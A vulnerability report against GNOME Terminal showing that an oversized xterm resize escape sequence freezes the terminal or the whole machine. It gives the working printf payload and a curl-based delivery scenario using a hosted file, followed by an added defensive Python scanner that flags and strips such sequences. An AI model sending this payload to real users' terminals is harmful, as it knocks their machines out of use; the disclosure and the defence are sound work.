Limit XTERM_WM resize number of rows and columns
Original reporter: Siddharth Dushantha
Area: Application
Message
The ANSI escape sequence "\e[4;<height>;<width>t" can be used to resize the terminal window, where "<height>" is the height and "<width>" is the width. Providing a large number such as 65535 for both values leads to a local denial of service, where the whole machine can be frozen.
This same vulnerability was found in XTerm back in 2000. The CVE for the vulnerability in XTerm is CVE-2000-0476.
Steps to reproduce:
- Open gnome-terminal
- Execute
printf "\e[4;65535;65535t"
in the terminal
Depending on the amount of memory on your machine, you will either experience the terminal window being frozen or the whole machine being frozen. When tested in a Kali Linux virtual machine, the whole machine froze and then the user got logged out.
An attacker can use this vulnerability to temporarily render someone's machine useless. In the example above, the victim executed the escape sequences themselves. An attacker can deliver this payload to the victim by hosting it in a file and having the victim use curl or similar to fetch the file.
attacker$ printf "\e[4;65535;65535t" > index.html
attacker$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
victim$ curl attacker-ip:8000 # everything will stop working
System info:
OS: Kali Linux
GNOME Terminal version: GNOME Terminal 3.52.1 using VTE 0.75.92 +BIDI +GNUTLS +ICU +SYSTEMD
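
A defensive check for the delivery path described in the report, as an added example that is not part of the original report or of VTE's code: it scans untrusted bytes (for instance a downloaded file) for xterm resize requests, CSI 4;height;width t in pixels and CSI 8;rows;cols t in character cells, and can strip them before the data reaches a terminal. The MAX_DIM limits, the function names and the sample bytes are assumptions constructed for illustration.

```python
import re

# ESC [ + parameter bytes + final byte "t" is the xterm window-manipulation family.
WINOPS = re.compile(rb"\x1b\[([0-9;:]*)t")

# Ps=4 resizes the window in pixels, Ps=8 resizes the text area in cells.
RESIZE_OPS = {4: "pixels", 8: "cells"}
MAX_DIM = {"pixels": 4096, "cells": 500}  # assumed policy limits, not VTE's


def _params(raw):
    """Split a CSI parameter string; empty fields become None (default)."""
    out = []
    for field in raw.split(b";"):
        head = field.split(b":")[0]
        out.append(int(head) if head.isdigit() else None)
    return out


def find_resize_requests(data):
    """Return (offset, unit, height, width, oversized) for each resize op."""
    hits = []
    for m in WINOPS.finditer(data):
        p = _params(m.group(1)) + [None, None]
        unit = RESIZE_OPS.get(p[0])
        if unit is None:
            continue  # some other window op, e.g. a state report
        height, width = p[1], p[2]
        oversized = any(v is not None and v > MAX_DIM[unit]
                        for v in (height, width))
        hits.append((m.start(), unit, height, width, oversized))
    return hits


def strip_resize_requests(data):
    """Remove resize ops from untrusted bytes; other sequences are kept."""
    def repl(m):
        return b"" if _params(m.group(1))[0] in RESIZE_OPS else m.group(0)
    return WINOPS.sub(repl, data)


# Constructed sample: the sequence from the report, a colour (SGR) sequence,
# and a window op that is not a resize (Ps=11).
SAMPLE = b"hello\x1b[4;65535;65535t\x1b[31mred\x1b[0m\x1b[11t\n"

if __name__ == "__main__":
    for hit in find_resize_requests(SAMPLE):
        print(hit)
    print(strip_resize_requests(SAMPLE))
```

Saving a fetched response to a file and running it through find_resize_requests before displaying it flags the oversized request without the terminal ever interpreting it.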